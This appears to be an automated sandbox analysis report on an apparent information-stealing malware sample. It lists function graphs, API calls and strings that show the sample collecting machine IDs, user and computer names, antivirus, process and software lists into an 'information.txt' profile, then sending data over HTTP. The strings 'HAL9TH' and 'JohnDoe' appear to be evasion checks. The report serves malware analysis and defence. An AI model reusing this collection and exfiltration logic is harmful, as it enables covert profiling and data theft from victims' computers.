                                                        control_flow_graph 1580 415e5b-415e67 call 415e38 1583 415e6d-41605a call 40685f GetProcAddress * 20 1580->1583 1584 41605f-4160bb LoadLibraryA * 5 1580->1584 1583->1584 1586 4160bd-4160ca GetProcAddress 1584->1586 1587 4160cf-4160d6 1584->1587 1586->1587 1589 416101-416108 1587->1589 1590 4160d8-4160fc GetProcAddress * 2 1587->1590 1591 41610a-416117 GetProcAddress 1589->1591 1592 41611c-416123 1589->1592 1590->1589 1591->1592 1593 416125-416132 GetProcAddress 1592->1593 1594 416137-41613e 1592->1594 1593->1594 1596 416140-416164 GetProcAddress * 2 1594->1596 1597 416169 1594->1597 1596->1597
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$LibraryLoad
                                                        • String ID:
                                                        • API String ID: 2238633743-0
                                                        • Opcode ID: 71b6b2f8f6d9c78cb2bc65049401391c44def24b9b90b9dfcc6755c843074e4d
                                                        • Instruction ID: 75ccff4f54100bd1182638356155a5dfc5dd174f08e52a3ff629790529d14cd6
                                                        • Opcode Fuzzy Hash: 71b6b2f8f6d9c78cb2bc65049401391c44def24b9b90b9dfcc6755c843074e4d
                                                        • Instruction Fuzzy Hash: EF712075816600EFEB155F61FE4A8653FB7F78A301304742AF906822B1DBF64865EFA0
                                                        Function 00412AF8 Relevance: 48.1, APIs: 2, Strings: 25, Instructions: 836stringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1598 412af8-41353f call 40e58f call 40e6e6 call 40e64d call 40e5fa call 40202d call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e863 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40ef3f call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40efcc call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40f08a call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa GetCurrentProcessId call 40fb2a call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40f1d0 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40f311 call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40f4a5 call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e828 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e7f6 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40eecd call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e910 call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e863 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e8bd call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e9fb call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40ea97 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40ea64 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40eb56 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40ebbf call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40ee28 call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40ec1e call 40e694 call 40e64d call 40e5fa * 2 call 40ec1e call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e778 lstrlenA call 40e778 call 40e58f call 401324 call 41296a call 40e5fa * 2 call 401301
                                                        APIs
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E863: GetProcessHeap.KERNEL32(00000000,00000104,00421414,Version: ,0041E266,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040E871
                                                          • Part of subcall function 0040E863: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040E878
                                                          • Part of subcall function 0040E863: GetLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040E884
                                                          • Part of subcall function 0040E863: wsprintfA.USER32 ref: 0040E8AF
                                                          • Part of subcall function 0040EF3F: memset.MSVCRT ref: 0040EF65
                                                          • Part of subcall function 0040EF3F: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,00421EE4), ref: 0040EF81
                                                          • Part of subcall function 0040EF3F: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,00421EE4), ref: 0040EFA0
                                                          • Part of subcall function 0040EF3F: CharToOemA.USER32(?,?), ref: 0040EFBD
                                                          • Part of subcall function 0040EFCC: GetCurrentHwProfileA.ADVAPI32(?), ref: 0040EFDC
                                                          • Part of subcall function 0040EFCC: memset.MSVCRT ref: 0040F007
                                                          • Part of subcall function 0040EFCC: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 0040F037
                                                          • Part of subcall function 0040EFCC: lstrcatA.KERNEL32(?,004218C4,?,?,?,?,?,?,?), ref: 0040F051
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                          • Part of subcall function 0040F08A: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00421EE4), ref: 0040F0A7
                                                          • Part of subcall function 0040F08A: GetVolumeInformationA.KERNEL32(MA,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0040F0D9
                                                          • Part of subcall function 0040F08A: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0040F11C
                                                          • Part of subcall function 0040F08A: HeapAlloc.KERNEL32(00000000), ref: 0040F123
                                                        • GetCurrentProcessId.KERNEL32(00000000,?,Path: ,00000000,?,00421690,00000000,?,00000000,00000000,?,HWID: ,00000000,?,00421414,00000000), ref: 00412D60
                                                          • Part of subcall function 0040FB2A: OpenProcess.KERNEL32(00000410,00000000,00000000,00421414), ref: 0040FB3E
                                                          • Part of subcall function 0040FB2A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0040FB59
                                                          • Part of subcall function 0040FB2A: CloseHandle.KERNEL32(00000000), ref: 0040FB60
                                                          • Part of subcall function 0040F1D0: GetProcessHeap.KERNEL32(00000000,00000104,00421690,?,?,?,00412E1D,00000000,?,Windows: ,00000000,?,00421690,00000000,?,Work Dir: In memory), ref: 0040F1E4
                                                          • Part of subcall function 0040F1D0: HeapAlloc.KERNEL32(00000000,?,?,?,00412E1D,00000000,?,Windows: ,00000000,?,00421690,00000000,?,Work Dir: In memory,00000000,?), ref: 0040F1EB
                                                          • Part of subcall function 0040F311: _EH_prolog.MSVCRT ref: 0040F316
                                                          • Part of subcall function 0040F311: CoInitializeEx.OLE32(00000000,00000000,00421690,00421414,00421EE4,?,?,?,?,00421690,00000000,?,Work Dir: In memory,00000000,?,00421414), ref: 0040F32B
                                                          • Part of subcall function 0040F311: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,00421690,00000000,?), ref: 0040F33C
                                                          • Part of subcall function 0040F311: CoCreateInstance.OLE32(004229F8,00000000,00000001,00422928,?,?,?,?,?,00421690,00000000,?,Work Dir: In memory,00000000,?,00421414), ref: 0040F356
                                                          • Part of subcall function 0040F311: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,?,?,?,00421690,00000000,?,Work Dir: In memory), ref: 0040F38C
                                                          • Part of subcall function 0040F311: VariantInit.OLEAUT32(?), ref: 0040F3E7
                                                          • Part of subcall function 0040F4A5: _EH_prolog.MSVCRT ref: 0040F4AA
                                                          • Part of subcall function 0040F4A5: CoInitializeEx.OLE32(00000000,00000000,00421690,00421414,00421EE4,?,Work Dir: In memory,00000000,?,00421414,00000000,?,00000000), ref: 0040F4BF
                                                          • Part of subcall function 0040F4A5: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0040F4D0
                                                          • Part of subcall function 0040F4A5: CoCreateInstance.OLE32(004229F8,00000000,00000001,00422928,?,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040F4EA
                                                          • Part of subcall function 0040F4A5: CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0040F520
                                                          • Part of subcall function 0040F4A5: VariantInit.OLEAUT32(?), ref: 0040F56F
                                                          • Part of subcall function 0040E828: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,0040104D,HAL9TH,0041586A), ref: 0040E834
                                                          • Part of subcall function 0040E828: HeapAlloc.KERNEL32(00000000,?,?,?,0040104D,HAL9TH,0041586A), ref: 0040E83B
                                                          • Part of subcall function 0040E828: GetComputerNameA.KERNEL32(00000000,?), ref: 0040E84F
                                                          • Part of subcall function 0040E7F6: GetProcessHeap.KERNEL32(00000000,00000104,?,HAL9TH,?,00401063,JohnDoe,0041586A), ref: 0040E802
                                                          • Part of subcall function 0040E7F6: HeapAlloc.KERNEL32(00000000,?,HAL9TH,?,00401063,JohnDoe,0041586A), ref: 0040E809
                                                          • Part of subcall function 0040E7F6: GetUserNameA.ADVAPI32(00000000,?), ref: 0040E81D
                                                          • Part of subcall function 0040EECD: CreateDCA.GDI32(00000000,00000000,00000000,00421690), ref: 0040EEDF
                                                          • Part of subcall function 0040EECD: GetDeviceCaps.GDI32(00000000,00000008), ref: 0040EEEA
                                                          • Part of subcall function 0040EECD: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040EEF5
                                                          • Part of subcall function 0040EECD: ReleaseDC.USER32(00000000,00000000), ref: 0040EF00
                                                          • Part of subcall function 0040EECD: GetProcessHeap.KERNEL32(00000000,00000104,?,?,0041302A,?,00000000,?,Display Resolution: ,00000000,?,00421414,00000000,?,00000000,00000000), ref: 0040EF0C
                                                          • Part of subcall function 0040EECD: HeapAlloc.KERNEL32(00000000,?,?,0041302A,?,00000000,?,Display Resolution: ,00000000,?,00421414,00000000,?,00000000,00000000,?), ref: 0040EF13
                                                          • Part of subcall function 0040EECD: wsprintfA.USER32 ref: 0040EF25
                                                          • Part of subcall function 0040E910: GetKeyboardLayoutList.USER32(00000000,00000000,0041E266,00421690,00421414,00421EE4), ref: 0040E930
                                                          • Part of subcall function 0040E910: LocalAlloc.KERNEL32(00000040,00000000), ref: 0040E93E
                                                          • Part of subcall function 0040E910: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 0040E948
                                                          • Part of subcall function 0040E910: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 0040E96D
                                                          • Part of subcall function 0040E910: LocalFree.KERNEL32(00000000), ref: 0040E9ED
                                                          • Part of subcall function 0040E8BD: GetProcessHeap.KERNEL32(00000000,00000104,00421414,?,Computer Name: ,00000000,?,00421414,00000000,?,00000000,00000000,?,AV: ,00000000,?), ref: 0040E8CE
                                                          • Part of subcall function 0040E8BD: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040E8D5
                                                          • Part of subcall function 0040E8BD: GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040E8E4
                                                          • Part of subcall function 0040E8BD: wsprintfA.USER32 ref: 0040E902
                                                          • Part of subcall function 0040E9FB: GetProcessHeap.KERNEL32(00000000,00000104,00421690,?,?,?,004131EE,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00421690), ref: 0040EA0F
                                                          • Part of subcall function 0040E9FB: HeapAlloc.KERNEL32(00000000,?,?,?,004131EE,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?,00421690,00000000,?), ref: 0040EA16
                                                          • Part of subcall function 0040E9FB: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,?,?,?,?,004131EE,00000000,?,Processor: ,00000000,?,[Hardware],00000000,?), ref: 0040EA34
                                                          • Part of subcall function 0040E9FB: RegQueryValueExA.KERNEL32(?,00000000,00000000,00000000,000000FF,?,?,?,004131EE,00000000,?,Processor: ,00000000,?,[Hardware],00000000), ref: 0040EA50
                                                          • Part of subcall function 0040EA97: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0040EAEA
                                                          • Part of subcall function 0040EA97: wsprintfA.USER32 ref: 0040EB30
                                                          • Part of subcall function 0040EA64: GetSystemInfo.KERNEL32(?), ref: 0040EA71
                                                          • Part of subcall function 0040EA64: wsprintfA.USER32 ref: 0040EA86
                                                          • Part of subcall function 0040EB56: GetProcessHeap.KERNEL32(00000000,00000104,00421690,?,Windows: ,00000000,?,00421690,00000000,?,Work Dir: In memory,00000000,?,00421414,00000000,?), ref: 0040EB64
                                                          • Part of subcall function 0040EB56: HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00414EE3,?), ref: 0040EB6B
                                                          • Part of subcall function 0040EB56: GlobalMemoryStatusEx.KERNEL32 ref: 0040EB8B
                                                          • Part of subcall function 0040EB56: wsprintfA.USER32 ref: 0040EBB1
                                                          • Part of subcall function 0040EBBF: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 0040EC0E
                                                          • Part of subcall function 0040EE28: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040EE50
                                                          • Part of subcall function 0040EE28: Process32First.KERNEL32(00000000,00000128), ref: 0040EE60
                                                          • Part of subcall function 0040EE28: Process32Next.KERNEL32(00000000,00000128), ref: 0040EEB6
                                                          • Part of subcall function 0040EE28: CloseHandle.KERNEL32(00000000), ref: 0040EEC1
                                                          • Part of subcall function 0040EC1E: RegOpenKeyExA.KERNEL32(00000000,00000000,00020019,00421414,0041E266,00421414,00421EE4), ref: 0040EC5C
                                                          • Part of subcall function 0040EC1E: RegEnumKeyExA.KERNEL32(00421414,?,?,?,00000000,00000000,00000000,00000000,00421690), ref: 0040ECA0
                                                          • Part of subcall function 0040EC1E: wsprintfA.USER32 ref: 0040ECCA
                                                          • Part of subcall function 0040EC1E: RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,?), ref: 0040ECE3
                                                          • Part of subcall function 0040EC1E: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 0040ED0D
                                                          • Part of subcall function 0040EC1E: lstrlenA.KERNEL32(?), ref: 0040ED22
                                                          • Part of subcall function 0040EC1E: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,00000000,00421690,?,00000000,00421414,00421414), ref: 0040ED93
                                                        • lstrlenA.KERNEL32(00000000,00000000,?,00421690,00000000,?,00000000,00000000,?,00000000,00000000,?,[Software],00000000,?,00421690), ref: 004134E8
                                                          • Part of subcall function 0041296A: _MSFOpenExW.MSPDB140-MSVCRT ref: 00412A12
                                                          • Part of subcall function 0041296A: CreateThread.KERNEL32(00000000,00000000,004118D1,?,00000000,00000000), ref: 00412A27
                                                          • Part of subcall function 0041296A: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00412A2F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000063B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Heap$Process$Alloc$wsprintf$Open$Create$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCloseCurrentDeviceEnumH_prologHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariantmemset$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalLocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                        • String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                        • API String ID: 3520518535-1014693891
                                                        • Opcode ID: e22c0389ac9eb29c679cd73a0c3545d1bab5a4781942e3320613e5fb34cc647c
                                                        • Instruction ID: d9ad699a064a4ff12cf1d81ddcdbd54695a46a32ac1719892d7354109eca4ec2
                                                        • Opcode Fuzzy Hash: e22c0389ac9eb29c679cd73a0c3545d1bab5a4781942e3320613e5fb34cc647c
                                                        • Instruction Fuzzy Hash: 91620E72C00019AACB15FB93ED92CDE7378AE24308B504A7BF117720D2EF356B19D669
                                                        Function 00405AF9 Relevance: 46.1, APIs: 20, Strings: 6, Instructions: 563networkstringmemoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 2111 405af9-405b93 call 40e5c6 call 403f08 call 40e58f * 5 call 40e778 InternetOpenA StrCmpCA 2128 405b95 2111->2128 2129 405b98-405b9b 2111->2129 2128->2129 2130 405ba1-405cd9 call 40f6c3 call 40e694 call 40e64d call 40e5fa * 2 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e694 call 40e64d call 40e5fa * 2 InternetConnectA 2129->2130 2131 40612e-406154 InternetCloseHandle call 40e778 call 406a53 2129->2131 2130->2131 2211 405cdf-405d11 HttpOpenRequestA 2130->2211 2140 406156-406177 call 40e603 call 40e6e6 call 40e64d call 40e5fa 2131->2140 2141 40617c-4061c8 call 40f5fb * 2 call 40e5fa * 4 call 401301 call 40e5fa 2131->2141 2140->2141 2212 406125-406128 InternetCloseHandle 2211->2212 2213 405d17-405d1b 2211->2213 2212->2131 2214 405d33-4060cd call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 402033 call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e6e6 call 40e64d call 40e5fa call 40e694 call 40e64d call 40e5fa call 40e778 lstrlenA call 40e778 lstrlenA GetProcessHeap HeapAlloc call 40e778 lstrlenA call 40e778 memcpy call 40e778 lstrlenA call 40e778 * 2 lstrlenA memcpy call 40e778 lstrlenA call 40e778 HttpSendRequestA 2213->2214 2215 405d1d-405d2d InternetSetOptionA 2213->2215 2374 406102-406117 InternetReadFile 2214->2374 2215->2214 2375 406119-406120 InternetCloseHandle 2374->2375 2376 4060cf-4060d4 2374->2376 2375->2212 2376->2375 2377 4060d6-4060fd call 40e6e6 call 40e64d call 40e5fa 2376->2377 2377->2374
                                                        APIs
                                                          • Part of subcall function 0040E5C6: lstrcpyA.KERNEL32(00000000,FEE8858D,00414CC5,?,?,00401334,00414CC5,0041E266,00000000,?,00414CC5,?), ref: 0040E5EC
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F34
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F3D
                                                          • Part of subcall function 00403F08: ??_U@YAPAXI@Z.MSVCRT ref: 00403F46
                                                          • Part of subcall function 00403F08: lstrlenA.KERNEL32(00000000,00000000,?,?,00421C30,ERROR), ref: 00403F60
                                                          • Part of subcall function 00403F08: InternetCrackUrlA.WININET(00000000,00000000,?,00421C30), ref: 00403F70
                                                          • Part of subcall function 0040E58F: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00415B01,0041E266), ref: 0040E5B9
                                                        • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405B73
                                                        • StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00421EE4), ref: 00405B8B
                                                        • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405CCC
                                                        • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00405D06
                                                        • lstrlenA.KERNEL32(00000000,00000000,CNA,?,00000000,CNA,",00000000,CNA,mode,00000000,CNA,00000000,CNA,00421360,00000000), ref: 00406023
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00421EE4), ref: 00406034
                                                        • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,00421EE4), ref: 0040603F
                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,00421EE4), ref: 00406046
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,00421EE4), ref: 00406057
                                                        • memcpy.MSVCRT ref: 00406068
                                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,00421EE4), ref: 00406079
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00421EE4), ref: 00406092
                                                        • memcpy.MSVCRT ref: 0040609B
                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00421EE4), ref: 004060AE
                                                        • HttpSendRequestA.WININET(?,00000000,00000000), ref: 004060C2
                                                        • InternetReadFile.WININET(?,?,000000C7,00000000), ref: 0040610F
                                                        • InternetCloseHandle.WININET(?), ref: 0040611A
                                                        • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00405D2D
                                                          • Part of subcall function 0040E64D: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BBB,00000000,?,?,00421420,?,00000000), ref: 0040E686
                                                          • Part of subcall function 0040E6E6: lstrlenA.KERNEL32(?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E6FE
                                                          • Part of subcall function 0040E6E6: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E726
                                                          • Part of subcall function 0040E6E6: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00415BA4,?,?,00421420,?,00000000), ref: 0040E731
                                                          • Part of subcall function 0040E694: lstrcpyA.KERNEL32(00000000,?,0041E266,00000000,00421EE4,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6CD
                                                          • Part of subcall function 0040E694: lstrcatA.KERNEL32(?,?,?,00414C85,00000000,?,?,0041E266,00000000), ref: 0040E6D7
                                                        • InternetCloseHandle.WININET(?), ref: 00406128
                                                        • InternetCloseHandle.WININET(?), ref: 00406131
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.2118686744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.2118686744.000000000042E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000432000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000436000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000045F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000047E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.000000000049D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000536000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000621000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000628000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                        • Associated: 00000002.00000002.2118686744.0000000000639000.00000040.00000400.00020000.00000000.sdmpDownload File
